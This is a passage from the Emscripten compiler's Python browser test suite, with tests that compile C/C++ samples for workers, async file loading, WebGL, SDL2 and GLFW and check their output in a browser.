expected='5') def test_worker_api_sleep(self): self.compile_btest([test_file('worker_api_worker_sleep.cpp'), '-o', 'worker.js', '-sBUILD_AS_WORKER', '-sEXPORTED_FUNCTIONS=_one', '-sASYNCIFY']) self.btest('worker_api_main.cpp', expected='566') def test_worker_api_with_pthread_compilation_fails(self): self.run_process([EMCC, '-c', '-o', 'hello.o', test_file('hello_world.c')]) stderr = self.expect_fail([EMCC, 'hello.o', '-o', 'a.js', '-g', '--closure=1', '-sUSE_PTHREADS', '-sBUILD_AS_WORKER=1']) self.assertContained("USE_PTHREADS + BUILD_AS_WORKER require separate modes that don't work together, see https://github.com/emscripten-core/emscripten/issues/8854", stderr) def test_emscripten_async_wget2(self): self.btest_exit('test_emscripten_async_wget2.cpp') @disabled('https://github.com/emscripten-core/emscripten/issues/15818') def test_emscripten_async_wget2_data(self): create_file('hello.txt', 'Hello Emscripten!') self.btest('test_emscripten_async_wget2_data.cpp', expected='0') def test_emscripten_async_wget_side_module(self): self.run_process([EMCC, test_file('browser_module.c'), '-o', 'lib.wasm', '-O2', '-sSIDE_MODULE']) self.btest_exit('browser_main.c', args=['-O2', '-sMAIN_MODULE=2']) @parameterized({ 'non-lz4': ([],), 'lz4': (['-sLZ4'],) }) def test_preload_module(self, args): create_file('library.c', r''' #include <stdio.h> int library_func() { return 42; } ''') self.run_process([EMCC, 'library.c', '-sSIDE_MODULE', '-O2', '-o', 'library.so']) create_file('main.c', r''' #include <dlfcn.h> #include <stdio.h> #include <emscripten.h> int main() { int found = EM_ASM_INT( return preloadedWasm['/library.so'] !== undefined; ); if (!found) { return 1; } void *lib_handle = dlopen("/library.so", RTLD_NOW); if (!lib_handle) { return 2; } typedef int (*voidfunc)(); voidfunc x = (voidfunc)dlsym(lib_handle, "library_func"); if (!x || x() != 42) { return 3; } return 0; } ''') self.btest_exit( 'main.c', args=['-sMAIN_MODULE=2', '--preload-file', '.@/', '-O2', '--use-preload-plugins'] + args) def test_mmap_file(self): create_file('data.dat', 'data from the file ' + ('.' * 9000)) self.btest(test_file('mmap_file.c'), expected='1', args=['--preload-file', 'data.dat']) # This does not actually verify anything except that --cpuprofiler and --memoryprofiler compiles. # Run interactive.test_cpuprofiler_memoryprofiler for interactive testing. @requires_graphics_hardware def test_cpuprofiler_memoryprofiler(self): self.btest_exit('hello_world_gles.c', args=['-DLONGTEST=1', '-DTEST_MEMORYPROFILER_ALLOCATIONS_MAP=1', '--cpuprofiler', '--memoryprofiler', '-lGL', '-lglut', '-DANIMATE']) def test_uuid(self): # Run with ./runner browser.test_uuid # We run this test in Node/SPIDERMONKEY and browser environments because we try to make use of # high quality crypto random number generators such as crypto.getRandomValues or randomBytes (if available). # First run tests in Node and/or SPIDERMONKEY using self.run_js. Use closure compiler so we can check that # require('crypto').randomBytes and window.crypto.getRandomValues doesn't get minified out. self.run_process([EMCC, '-O2', '--closure=1', test_file('uuid/test.c'), '-o', 'test.js', '-luuid']) test_js_closure = read_file('test.js') # Check that test.js compiled with --closure 1 contains ").randomBytes" and "window.crypto.getRandomValues" assert ").randomBytes" in test_js_closure assert "window.crypto.getRandomValues" in test_js_closure out = self.run_js('test.js') print(out) # Tidy up files that might have been created by this test. try_delete(test_file('uuid/test.js')) try_delete(test_file('uuid/test.js.map')) # Now run test in browser self.btest_exit(test_file('uuid/test.c'), args=['-luuid']) @requires_graphics_hardware def test_glew(self): self.btest(test_file('glew.c'), args=['-lGL', '-lSDL', '-lGLEW'], expected='1') self.btest(test_file('glew.c'), args=['-lGL', '-lSDL', '-lGLEW', '-sLEGACY_GL_EMULATION'], expected='1') self.btest(test_file('glew.c'), args=['-lGL', '-lSDL', '-lGLEW', '-DGLEW_MX'], expected='1') self.btest(test_file('glew.c'), args=['-lGL', '-lSDL', '-lGLEW', '-sLEGACY_GL_EMULATION', '-DGLEW_MX'], expected='1') def test_doublestart_bug(self): create_file('pre.js', r''' if (!Module['preRun']) Module['preRun'] = []; Module["preRun"].push(function () { addRunDependency('test_run_dependency'); removeRunDependency('test_run_dependency'); }); ''') self.btest('doublestart.c', args=['--pre-js', 'pre.js'], expected='1') @parameterized({ '': ([],), 'closure': (['-O2', '-g1', '--closure=1', '-sHTML5_SUPPORT_DEFERRING_USER_SENSITIVE_REQUESTS=0'],), 'pthread': (['-sUSE_PTHREADS', '-sPROXY_TO_PTHREAD'],), 'legacy': (['-sMIN_FIREFOX_VERSION=0', '-sMIN_SAFARI_VERSION=0', '-sMIN_IE_VERSION=0', '-sMIN_EDGE_VERSION=0', '-sMIN_CHROME_VERSION=0', '-Wno-transpile'],) }) @requires_threads def test_html5_core(self, opts): if '-sHTML5_SUPPORT_DEFERRING_USER_SENSITIVE_REQUESTS=0' in opts: # In this mode an exception can be thrown by the browser, and we don't # want the test to fail in that case so we override the error handling. create_file('pre.js', ''' window.disableErrorReporting = true; window.addEventListener('error', (event) => { if (!event.message.includes('exception:fullscreen error')) { report_error(event); } }); ''') self.emcc_args.append('--pre-js=pre.js') self.btest(test_file('test_html5_core.c'), args=opts, expected='0') @requires_threads def test_html5_gamepad(self): for opts in [[], ['-O2', '-g1', '--closure=1'], ['-sUSE_PTHREADS', '-sPROXY_TO_PTHREAD']]: print(opts) self.btest_exit(test_file('test_gamepad.c'), args=[] + opts) @requires_graphics_hardware def test_html5_webgl_create_context_no_antialias(self): for opts in [[], ['-O2', '-g1', '--closure=1'], ['-sFULL_ES2=1']]: print(opts) self.btest_exit(test_file('webgl_create_context.cpp'), args=opts + ['-DNO_ANTIALIAS', '-lGL']) # This test supersedes the one above, but it's skipped in the CI because anti-aliasing is not well supported by the Mesa software renderer. @requires_threads @requires_graphics_hardware def test_html5_webgl_create_context(self): for opts in [[], ['-O2', '-g1', '--closure=1'], ['-sFULL_ES2=1'], ['-sUSE_PTHREADS']]: print(opts) self.btest_exit(test_file('webgl_create_context.cpp'), args=opts + ['-lGL']) @requires_graphics_hardware # Verify bug https://github.com/emscripten-core/emscripten/issues/4556: creating a WebGL context to Module.canvas without an ID explicitly assigned to it. def test_html5_webgl_create_context2(self): self.btest_exit(test_file('webgl_create_context2.cpp')) @requires_graphics_hardware # Verify bug https://github.com/emscripten-core/emscripten/issues/4556: creating a WebGL context to Module.canvas without an ID explicitly assigned to it. # (this only makes sense in the old deprecated -sDISABLE_DEPRECATED_FIND_EVENT_TARGET_BEHAVIOR=0 mode) def test_html5_special_event_targets(self): self.btest(test_file('browser/html5_special_event_targets.cpp'), args=['-lGL'], expected='0') @requires_graphics_hardware def test_html5_webgl_destroy_context(self): for opts in [[], ['-O2', '-g1'], ['-sFULL_ES2=1']]: print(opts) self.btest_exit(test_file('webgl_destroy_context.cpp'), args=opts + ['--shell-file', test_file('webgl_destroy_context_shell.html'), '-lGL']) @no_chrome('see #7373') @requires_graphics_hardware def test_webgl_context_params(self): if WINDOWS: self.skipTest('SKIPPED due to bug https://bugzilla.mozilla.org/show_bug.cgi?id=1310005 - WebGL implementation advertises implementation defined GL_IMPLEMENTATION_COLOR_READ_TYPE/FORMAT pair that it cannot read with') self.btest_exit(test_file('webgl_color_buffer_readpixels.cpp'), args=['-lGL']) # Test for PR#5373 (https://github.com/emscripten-core/emscripten/pull/5373) @requires_graphics_hardware def test_webgl_shader_source_length(self): for opts in [[], ['-sFULL_ES2=1']]: print(opts) self.btest_exit(test_file('webgl_shader_source_length.cpp'), args=opts + ['-lGL']) # Tests calling glGetString(GL_UNMASKED_VENDOR_WEBGL). @requires_graphics_hardware def test_webgl_unmasked_vendor_webgl(self): self.btest_exit(test_file('webgl_unmasked_vendor_webgl.c'), args=['-lGL']) @requires_graphics_hardware def test_webgl2(self): for opts in [ ['-sMIN_CHROME_VERSION=0', '-Wno-transpile'], ['-O2', '-g1', '--closure=1', '-sWORKAROUND_OLD_WEBGL_UNIFORM_UPLOAD_IGNORED_OFFSET_BUG'], ['-sFULL_ES2=1'], ]: print(opts) self.btest_exit(test_file('webgl2.cpp'), args=['-sMAX_WEBGL_VERSION=2', '-lGL'] + opts) # Tests the WebGL 2 glGetBufferSubData() functionality. @requires_graphics_hardware def test_webgl2_get_buffer_sub_data(self): self.btest_exit(test_file('webgl2_get_buffer_sub_data.cpp'), args=['-sMAX_WEBGL_VERSION=2', '-lGL']) @requires_graphics_hardware @requires_threads def test_webgl2_pthreads(self): # test that a program can be compiled with pthreads and render WebGL2 properly on the main thread # (the testcase doesn't even use threads, but is compiled with thread support). self.btest_exit(test_file('webgl2.cpp'), args=['-sMAX_WEBGL_VERSION=2', '-lGL', '-sUSE_PTHREADS']) @requires_graphics_hardware def test_webgl2_objects(self): self.btest_exit(test_file('webgl2_objects.cpp'), args=['-sMAX_WEBGL_VERSION=2', '-lGL']) @requires_graphics_hardware def test_html5_webgl_api(self): for mode in [['-sOFFSCREENCANVAS_SUPPORT', '-sUSE_PTHREADS', '-sPROXY_TO_PTHREAD'], ['-sOFFSCREEN_FRAMEBUFFER', '-sUSE_PTHREADS', '-sPROXY_TO_PTHREAD'], []]: if 'OFFSCREENCANVAS_SUPPORT' in mode and os.getenv('EMTEST_LACKS_OFFSCREEN_CANVAS'): continue self.btest_exit(test_file('html5_webgl.c'), args=['-sMAX_WEBGL_VERSION=2', '-lGL'] + mode) @requires_graphics_hardware def test_webgl2_ubos(self): self.btest_exit(test_file('webgl2_ubos.cpp'), args=['-sMAX_WEBGL_VERSION=2', '-lGL']) @requires_graphics_hardware def test_webgl2_garbage_free_entrypoints(self): self.btest_exit(test_file('webgl2_garbage_free_entrypoints.cpp'), args=['-sMAX_WEBGL_VERSION=2', '-DTEST_WEBGL2=1']) self.btest_exit(test_file('webgl2_garbage_free_entrypoints.cpp')) @requires_graphics_hardware def test_webgl2_backwards_compatibility_emulation(self): self.btest_exit(test_file('webgl2_backwards_compatibility_emulation.cpp'), args=['-sMAX_WEBGL_VERSION=2', '-sWEBGL2_BACKWARDS_COMPATIBILITY_EMULATION=1']) @requires_graphics_hardware def test_webgl2_runtime_no_context(self): # tests that if we support WebGL1 and 2, and WebGL2RenderingContext exists, # but context creation fails, that we can then manually try to create a # WebGL1 context and succeed. self.btest_exit(test_file('test_webgl2_runtime_no_context.cpp'), args=['-sMAX_WEBGL_VERSION=2']) @requires_graphics_hardware def test_webgl2_invalid_teximage2d_type(self): self.btest_exit(test_file('webgl2_invalid_teximage2d_type.cpp'), args=['-sMAX_WEBGL_VERSION=2']) @requires_graphics_hardware def test_webgl_with_closure(self): self.btest_exit(test_file('webgl_with_closure.cpp'), args=['-O2', '-sMAX_WEBGL_VERSION=2', '--closure=1', '-lGL']) # Tests that -sGL_ASSERTIONS and glVertexAttribPointer with packed types works @requires_graphics_hardware def test_webgl2_packed_types(self): self.btest_exit(test_file('webgl2_draw_packed_triangle.c'), args=['-lGL', '-sMAX_WEBGL_VERSION=2', '-sGL_ASSERTIONS']) @requires_graphics_hardware def test_webgl2_pbo(self): self.btest_exit(test_file('webgl2_pbo.cpp'), args=['-sMAX_WEBGL_VERSION=2', '-lGL']) @no_firefox('fails on CI likely due to GPU drivers there') @requires_graphics_hardware def test_webgl2_sokol_mipmap(self): self.btest(test_file('third_party/sokol/mipmap-emsc.c'), args=['-sMAX_WEBGL_VERSION=2', '-lGL', '-O1'], reference=Path('third_party/sokol', 'mipmap-emsc.png'), reference_slack=2) @no_firefox('fails on CI likely due to GPU drivers there') @requires_graphics_hardware def test_webgl2_sokol_mrt(self): self.btest(test_file('third_party/sokol/mrt-emcc.c'), args=['-sMAX_WEBGL_VERSION=2', '-lGL'], reference=Path('third_party/sokol', 'mrt-emcc.png')) @requires_graphics_hardware def test_webgl2_sokol_arraytex(self): self.btest(test_file('third_party/sokol/arraytex-emsc.c'), args=['-sMAX_WEBGL_VERSION=2', '-lGL'], reference=Path('third_party/sokol', 'arraytex-emsc.png')) def test_sdl_touch(self): for opts in [[], ['-O2', '-g1', '--closure=1']]: print(opts) self.btest(test_file('sdl_touch.c'), args=opts + ['-DAUTOMATE_SUCCESS=1', '-lSDL', '-lGL'], expected='0') def test_html5_mouse(self): for opts in [[], ['-O2', '-g1', '--closure=1']]: print(opts) self.btest(test_file('test_html5_mouse.c'), args=opts + ['-DAUTOMATE_SUCCESS=1'], expected='0') def test_sdl_mousewheel(self): for opts in [[], ['-O2', '-g1', '--closure=1']]: print(opts) self.btest_exit(test_file('test_sdl_mousewheel.c'), args=opts + ['-DAUTOMATE_SUCCESS=1', '-lSDL', '-lGL']) def test_wget(self): create_file('test.txt', 'emscripten') self.btest_exit(test_file('test_wget.c'), args=['-sASYNCIFY']) def test_wget_data(self): create_file('test.txt', 'emscripten') self.btest_exit(test_file('test_wget_data.c'), args=['-O2', '-g2', '-sASYNCIFY']) @parameterized({ '': ([],), 'es6': (['-sEXPORT_ES6=1'],), }) def test_locate_file(self, args): self.set_setting('EXIT_RUNTIME') for wasm in [0, 1]: self.clear() create_file('src.cpp', r''' #include <stdio.h> #include <string.h> #include <assert.h> int main() { FILE *f = fopen("data.txt", "r"); assert(f && "could not open file"); char buf[100]; int num = fread(buf, 1, 20, f); assert(num == 20 && "could not read 20 bytes"); buf[20] = 0; fclose(f); printf("|%s|\n", buf); assert(strcmp("load me right before", buf) == 0); return 0; } ''') create_file('data.txt', 'load me right before...') create_file('pre.js', 'Module.locateFile = function(x) { return "sub/" + x };') self.run_process([FILE_PACKAGER, 'test.data', '--preload', 'data.txt'], stdout=open('data.js', 'w')) # put pre.js first, then the file packager data, so locateFile is there for the file loading code self.compile_btest(['src.cpp', '-O2', '-g', '--pre-js', 'pre.js', '--pre-js', 'data.js', '-o', 'page.html', '-sFORCE_FILESYSTEM', '-sWASM=' + str(wasm)] + args, reporting=Reporting.JS_ONLY) ensure_dir('sub') if wasm: shutil.move('page.wasm', Path('sub/page.wasm')) else: shutil.move('page.html.mem', Path('sub/page.html.mem')) shutil.move('test.data', Path('sub/test.data')) self.run_browser('page.html', None, '/report_result?exit:0') # alternatively, put locateFile in the HTML print('in html') create_file('shell.html', ''' <body> <script> var Module = { locateFile: function(x) { return "sub/" + x } }; </script> {{{ SCRIPT }}} </body> ''') def in_html(expected): self.compile_btest(['src.cpp', '-O2', '-g', '--shell-file', 'shell.html', '--pre-js', 'data.js', '-o', 'page.html', '-sSAFE_HEAP', '-sASSERTIONS', '-sFORCE_FILESYSTEM', '-sWASM=' + str(wasm)] + args, reporting=Reporting.JS_ONLY) if wasm: shutil.move('page.wasm', Path('sub/page.wasm')) else: shutil.move('page.html.mem', Path('sub/page.html.mem')) self.run_browser('page.html', None, '/report_result?exit:' + expected) in_html('0') # verify that the mem init request succeeded in the latter case if not wasm: create_file('src.cpp', r''' #include <stdio.h> #include <emscripten.h> int main() { int result = EM_ASM_INT({ return Module['memoryInitializerRequest'].status; }); printf("memory init request: %d\n", result); return result; } ''') in_html('200') @requires_graphics_hardware @parameterized({ 'no_gl': (['-DCLIENT_API=GLFW_NO_API'],), 'gl_es': (['-DCLIENT_API=GLFW_OPENGL_ES_API'],) }) def test_glfw3(self, args): for opts in [[], ['-sLEGACY_GL_EMULATION'], ['-Os', '--closure=1']]: print(opts) self.btest(test_file('glfw3.c'), args=['-sUSE_GLFW=3', '-lglfw', '-lGL'] + args + opts, expected='1') @requires_graphics_hardware def test_glfw_events(self): self.btest(test_file('glfw_events.c'), args=['-sUSE_GLFW=2', "-DUSE_GLFW=2", '-lglfw', '-lGL'], expected='1') self.btest(test_file('glfw_events.c'), args=['-sUSE_GLFW=3', "-DUSE_GLFW=3", '-lglfw', '-lGL'], expected='1') @requires_graphics_hardware def test_sdl2_image(self): # load an image file, get pixel data. Also O2 coverage for --preload-file, and memory-init shutil.copyfile(test_file('screenshot.jpg'), 'screenshot.jpg') for mem in [0, 1]: for dest, dirname, basename in [('screenshot.jpg', '/', 'screenshot.jpg'), ('screenshot.jpg@/assets/screenshot.jpg', '/assets', 'screenshot.jpg')]: self.compile_btest([ test_file('sdl2_image.c'), '-o', 'page.html', '-O2', '--memory-init-file', str(mem), '--preload-file', dest, '-DSCREENSHOT_DIRNAME="' + dirname + '"', '-DSCREENSHOT_BASENAME="' + basename + '"', '-sUSE_SDL=2', '-sUSE_SDL_IMAGE=2', '--use-preload-plugins' ]) self.run_browser('page.html', '', '/report_result?600') @requires_graphics_hardware def test_sdl2_image_jpeg(self): shutil.copyfile(test_file('screenshot.jpg'), 'screenshot.jpeg') self.compile_btest([ test_file('sdl2_image.c'), '-o', 'page.html', '--preload-file', 'screenshot.jpeg', '-DSCREENSHOT_DIRNAME="/"', '-DSCREENSHOT_BASENAME="screenshot.jpeg"', '-sUSE_SDL=2', '-sUSE_SDL_IMAGE=2', '--use-preload-plugins' ]) self.run_browser('page.html', '', '/report_result?600') @requires_graphics_hardware def test_sdl2_image_formats(self): shutil.copyfile(test_file('screenshot.png'), 'screenshot.png') shutil.copyfile(test_file('screenshot.jpg'), 'screenshot.jpg') self.btest('sdl2_image.c', expected='512', args=['--preload-file', 'screenshot.png', '-DSCREENSHOT_DIRNAME="/"', '-DSCREENSHOT_BASENAME="screenshot.png"', '-DNO_PRELOADED', '-sUSE_SDL=2', '-sUSE_SDL_IMAGE=2', '-sSDL2_IMAGE_FORMATS=["png"]']) self.btest('sdl2_image.c', expected='600', args=['--preload-file', 'screenshot.jpg', '-DSCREENSHOT_DIRNAME="/"', '-DSCREENSHOT_BASENAME="screenshot.jpg"', '-DBITSPERPIXEL=24', '-DNO_PRELOADED', '-sUSE_SDL=2', '-sUSE_SDL_IMAGE=2', '-sSDL2_IMAGE_FORMATS=["jpg"]']) def test_sdl2_key(self): create_file('pre.js', ''' Module.postRun = function() { function doOne() { Module._one(); setTimeout(doOne, 1000/60); } setTimeout(doOne, 1000/60); } function keydown(c) { var event = new KeyboardEvent("keydown", { 'keyCode': c, 'charCode': c, 'view': window, 'bubbles': true, 'cancelable': true }); var prevented = !document.dispatchEvent(event); //send keypress if not prevented if (!prevented) { var event = new KeyboardEvent("keypress", { 'keyCode': c, 'charCode': c, 'view': window, 'bubbles': true, 'cancelable': true }); document.dispatchEvent(event); } } function keyup(c) { var event = new KeyboardEvent("keyup", { 'keyCode': c, 'charCode': c, 'view': window, 'bubbles': true, 'cancelable': true }); document.dispatchEvent(event); } ''') self.compile_btest([test_file('sdl2_key.c'), '-o', 'page.html', '-sUSE_SDL=2', '--pre-js', 'pre.js', '-sEXPORTED_FUNCTIONS=_main,_one']) self.run_browser('page.html', '', '/report_result?37182145') def test_sdl2_text(self): create_file('pre.js', ''' Module.postRun = function() { function doOne() { Module._one(); setTimeout(doOne, 1000/60); } setTimeout(doOne, 1000/60); } function simulateKeyEvent(c) { var event = new KeyboardEvent("keypress", { 'keyCode': c, 'charCode': c, 'view': window, 'bubbles': true, 'cancelable': true }); document.body.dispatchEvent(event); } ''') self.compile_btest([test_file('sdl2_text.c'), '-o', 'page.html', '--pre-js', 'pre.js', '-sEXPORTED_FUNCTIONS=_main,_one', '-sUSE_SDL=2']) self.run_browser('page.html', '', '/report_result?1') @requires_graphics_hardware def test_sdl2_mouse(self): create_file('pre.js', ''' function simulateMouseEvent(x, y, button) { var event = document.createEvent("MouseEvents"); if (button >= 0) { var event1 = document.createEvent("MouseEvents"); event1.initMouseEvent('mousedown', true, true, window, 1, Module['canvas'].offsetLeft + x, Module['canvas'].offsetTop + y, Module['canvas'].offsetLeft + x, Module['canvas'].offsetTop + y, 0, 0, 0, 0, button, null); Module['canvas'].dispatchEvent(event1); var event2 = document.createEvent("MouseEvents"); event2.initMouseEvent('mouseup', true, true, window, 1, Module['canvas'].offsetLeft + x, Module['canvas'].offsetTop + y, Module['canvas'].offsetLeft + x, Module['canvas'].offsetTop + y, 0, 0, 0, 0, button, null); Module['canvas'].dispatchEvent(event2); } else { var event1 = document.createEvent("MouseEvents"); event1.initMouseEvent('mousemove', true, true, window, 0, Module['canvas'].offsetLeft + x, Module['canvas'].offsetTop + y, Module['canvas'].offsetLeft + x, Module['canvas'].offsetTop + y, 0, 0, 0, 0, 0, null); Module['canvas'].dispatchEvent(event1); } } window['simulateMouseEvent'] = simulateMouseEvent; ''') self.compile_btest([test_file('sdl2_mouse.c'), '-O2', '--minify=0', '-o', 'page.html', '--pre-js', 'pre.js', '-sUSE_SDL=2']) self.run_browser('page.html', '', '/report_result?1') @requires_graphics_hardware def test_sdl2_mouse_offsets(self): create_file('pre.js', ''' function simulateMouseEvent(x, y, button) { var event = document.createEvent("MouseEvents"); if (button >= 0) { var event1 = document.createEvent("MouseEvents"); event1.initMouseEvent('mousedown', true, true, window, 1, x, y, x, y, 0, 0, 0, 0, button, null); Module['canvas'].dispatchEvent(event1); var event2 = document.createEvent("MouseEvents"); event2.initMouseEvent('mouseup', true, true, window, 1, x, y, x, y, 0, 0, 0, 0, button, null); Module['canvas'].dispatchEvent(event2); } else { var event1 = document.createEvent("MouseEvents"); event1.initMouseEvent('mousemove', true, true, window, 0, x, y, x, y, 0, 0, 0, 0, 0, null); Module['canvas'].dispatchEvent(event1); } } window['simulateMouseEvent'] = simulateMouseEvent; ''') create_file('page.html', ''' <html> <head> <style type="text/css"> html, body { margin: 0; padding: 0; } #container { position: absolute; left: 5px; right: 0; top: 5px; bottom: 0; } #canvas { position: absolute; left: 0; width: 600px; top: 0; height: 450px; } textarea { margin-top: 500px; margin-left: 5px; width: 600px; } </style> </head> <body> <div id="container"> <canvas id="canvas"></canvas> </div> <textarea id="output" rows="8"></textarea> <script type="text/javascript"> var Module = { canvas: document.getElementById('canvas'), print: (function() { var element = document.getElementById('output'); element.value = ''; // clear browser cache return function(text) { if (arguments.length > 1) text = Array.prototype.slice.call(arguments).join(' '); element.value += text + "\\n"; element.scrollTop = element.scrollHeight; // focus on bottom }; })() }; </script> <script type="text/javascript" src="sdl2_mouse.js"></script> </body> </html> ''') self.compile_btest([test_file('sdl2_mouse.c'), '-DTEST_SDL_MOUSE_OFFSETS=1', '-O2', '--minify=0', '-o', 'sdl2_mouse.js', '--pre-js', 'pre.js', '-sUSE_SDL=2']) self.run_browser('page.html', '', '/report_result?1') @requires_threads def test_sdl2_threads(self): self.btest('sdl2_threads.c', expected='4', args=['-sUSE_PTHREADS', '-sUSE_SDL=2', '-sPROXY_TO_PTHREAD']) @requires_graphics_hardware def test_sdl2glshader(self): self.btest('sdl2glshader.c', reference='sdlglshader.png', args=['-sUSE_SDL=2', '-O2', '--closure=1', '-g1', '-sLEGACY_GL_EMULATION']) self.btest('sdl2glshader.c', reference='sdlglshader.png', args=['-sUSE_SDL=2', '-O2', '-sLEGACY_GL_EMULATION'], also_proxied=True) # XXX closure fails on proxy @requires_graphics_hardware def test_sdl2_canvas_blank(self): self.btest('sdl2_canvas_blank.c', reference='sdl_canvas_blank.png', args=['-sUSE_SDL=2']) @requires_graphics_hardware def test_sdl2_canvas_palette(self): self.btest('sdl2_canvas_palette.c', reference='sdl_canvas_palette.png', args=['-sUSE_SDL=2']) @requires_graphics_hardware def test_sdl2_canvas_twice(self): self.btest('sdl2_canvas_twice.c', reference='sdl_canvas_twice.png', args=['-sUSE_SDL=2']) @requires_graphics_hardware def test_sdl2_gfx(self): self.btest('sdl2_gfx.cpp', args=['-sUSE_SDL=2', '-sUSE_SDL_GFX=2'], reference='sdl2_gfx.png', reference_slack=2) @requires_graphics_hardware def test_sdl2_canvas_palette_2(self): create_file('args-r.js', ''' Module['arguments'] = ['-r']; ''') create_file('args-g.js', ''' Module['arguments'] = ['-g']; ''') create_file('args-b.js', ''' Module['arguments'] = ['-b']; ''') self.btest('sdl2_canvas_palette_2.c', reference='sdl_canvas_palette_r.png', args=['-sUSE_SDL=2', '--pre-js', 'args-r.js']) self.btest('sdl2_canvas_palette_2.c', reference='sdl_canvas_palette_g.png', args=['-sUSE_SDL=2', '--pre-js', 'args-g.js']) self.btest('sdl2_canvas_palette_2.c', reference='sdl_canvas_palette_b.png', args=['-sUSE_SDL=2', '--pre-js', 'args-b.js']) def test_sdl2_swsurface(self): self.btest('sdl2_swsurface.c', expected='1', args=['-sUSE_SDL=2', '-sINITIAL_MEMORY=64MB']) @requires_graphics_hardware def test_sdl2_image_prepare(self): # load an image file, get pixel data. shutil.copyfile(test_file('screenshot.jpg'), 'screenshot.not') self.btest('sdl2_image_prepare.c', reference='screenshot.jpg', args=['--preload-file', 'screenshot.not', '-sUSE_SDL=2', '-sUSE_SDL_IMAGE=2'], manually_trigger_reftest=True) @requires_graphics_hardware def test_sdl2_image_prepare_data(self): # load an image file, get pixel data. shutil.copyfile(test_file('screenshot.jpg'), 'screenshot.not') self.btest('sdl2_image_prepare_data.c', reference='screenshot.jpg', args=['--preload-file', 'screenshot.not', '-sUSE_SDL=2', '-sUSE_SDL_IMAGE=2'], manually_trigger_reftest=True) @requires_graphics_hardware def test_sdl2_canvas_proxy(self): def post(): html = read_file('test.html') html = html.replace('</body>', ''' <script> function assert(x, y) { if (!x) throw 'assertion failed ' + y } %s var windowClose = window.close; window.close = function() { // wait for rafs to arrive and the screen to update before reftesting setTimeout(function() { doReftest(); setTimeout(windowClose, 5000); }, 1000); }; </script> </body>''' % read_file('reftest.js')) create_file('test.html', html) create_file('data.txt', 'datum') self.btest('sdl2_canvas_proxy.c', reference='sdl2_canvas.png', args=['-sUSE_SDL=2', '--proxy-to-worker', '--preload-file', 'data.txt', '-sGL_TESTING'], manual_reference=True, post_build=post) def test_sdl2_pumpevents(self): # key events should be detected using SDL_PumpEvents create_file('pre.js', ''' function keydown(c) { var event = new KeyboardEvent("keydown", { 'keyCode': c, 'charCode': c, 'view': window, 'bubbles': true, 'cancelable': true }); document.dispatchEvent(event); } ''') self.btest('sdl2_pumpevents.c', expected='7', args=['--pre-js', 'pre.js', '-sUSE_SDL=2']) def test_sdl2_timer(self): self.btest('sdl2_timer.c', expected='5', args=['-sUSE_SDL=2']) def test_sdl2_canvas_size(self): self.btest('sdl2_canvas_size.c', expected='1', args=['-sUSE_SDL=2']) @requires_graphics_hardware def test_sdl2_gl_read(self): # SDL, OpenGL, readPixels self.compile_btest([test_file('sdl2_gl_read.c'), '-o', 'something.html', '-sUSE_SDL=2']) self.run_browser('something.html', '.', '/report_result?1') @requires_graphics_hardware def test_sdl2_glmatrixmode_texture(self): self.btest('sdl2_glmatrixmode_texture.c', reference='sdl2_glmatrixmode_texture.png', args=['-sLEGACY_GL_EMULATION', '-sUSE_SDL=2'], message='You should see a (top) red-white and (bottom) white-red image.') @requires_graphics_hardware def test_sdl2_gldrawelements(self): self.btest('sdl2_gldrawelements.c', reference='sdl2_gldrawelements.png', args=['-sLEGACY_GL_EMULATION', '-sUSE_SDL=2'], message='GL drawing modes. Bottom: points, lines, line loop, line strip. Top: triangles, triangle strip, triangle fan, quad.') @requires_graphics_hardware def test_sdl2_glclipplane_gllighting(self): self.btest('sdl2_glclipplane_gllighting.c', reference='sdl2_glclipplane_gllighting.png', args=['-sLEGACY_GL_EMULATION', '-sUSE_SDL=2'], message='glClipPlane and GL_LIGHTING emulation. You should see a torus cut open on one side with lighting from one lightsource applied.') @requires_graphics_hardware def test_sdl2_glalphatest(self): self.btest('sdl2_glalphatest.c', reference='sdl2_glalphatest.png', args=['-sLEGACY_GL_EMULATION', '-sUSE_SDL=2'], message='GL_ALPHA_TEST emulation. You should see gradients with different alpha testing modes and reference values.') @requires_graphics_hardware def test_sdl2_fog_simple(self): shutil.copyfile(test_file('screenshot.png'), 'screenshot.png') self.btest('sdl2_fog_simple.c', reference='screenshot-fog-simple.png', args=['-sUSE_SDL=2', '-sUSE_SDL_IMAGE=2', '-O2', '--minify=0', '--preload-file', 'screenshot.png', '-sLEGACY_GL_EMULATION', '--use-preload-plugins'], message='You should see an image with fog.') @requires_graphics_hardware def test_sdl2_fog_negative(self): shutil.copyfile(test_file('screenshot.png'), 'screenshot.png') self.btest('sdl2_fog_negative.c', reference='screenshot-fog-negative.png', args=['-sUSE_SDL=2', '-sUSE_SDL_IMAGE=2', '--preload-file', 'screenshot.png', '-sLEGACY_GL_EMULATION', '--use-preload-plugins'], message='You should see an image with fog.') @requires_graphics_hardware def test_sdl2_fog_density(self): shutil.copyfile(test_file('screenshot.png'), 'screenshot.png') self.btest('sdl2_fog_density.c', reference='screenshot-fog-density.png', args=['-sUSE_SDL=2', '-sUSE_SDL_IMAGE=2', '--preload-file', 'screenshot.png', '-sLEGACY_GL_EMULATION', '--use-preload-plugins'], message='You should see an image with fog.') @requires_graphics_hardware def test_sdl2_fog_exp2(self): shutil.copyfile(test_file('screenshot.png'), 'screenshot.png') self.btest('sdl2_fog_exp2.c', reference='screenshot-fog-exp2.png', args=['-sUSE_SDL=2', '-sUSE_SDL_IMAGE=2', '--preload-file', 'screenshot.png', '-sLEGACY_GL_EMULATION', '--use-preload-plugins'], message='You should see an image with fog.') @requires_graphics_hardware def test_sdl2_fog_linear(self): shutil.copyfile(test_file('screenshot.png'), 'screenshot.png') self.btest('sdl2_fog_linear.c', reference='screenshot-fog-linear.png', reference_slack=1, args=['-sUSE_SDL=2', '-sUSE_SDL_IMAGE=2', '--preload-file', 'screenshot.png', '-sLEGACY_GL_EMULATION', '--use-preload-plugins'], message='You should see an image with fog.') def test_sdl2_unwasteful(self): self.btest('sdl2_unwasteful.cpp', expected='1', args=['-sUSE_SDL=2', '-O1']) def test_sdl2_canvas_write(self): self.btest('sdl2_canvas_write.cpp', expected='0', args=['-sUSE_SDL=2']) @requires_graphics_hardware def test_sdl2_gl_frames_swap(self): def post_build(*args): self.post_manual_reftest(*args) html = read_file('test.html') html2 = html.replace('''Module['postRun'] = doReftest;''', '') # we don't want the very first frame assert html != html2 create_file('test.html', html2) self.btest('sdl2_gl_frames_swap.c', reference='sdl2_gl_frames_swap.png', args=['--proxy-to-worker', '-sGL_TESTING', '-sUSE_SDL=2'], manual_reference=True, 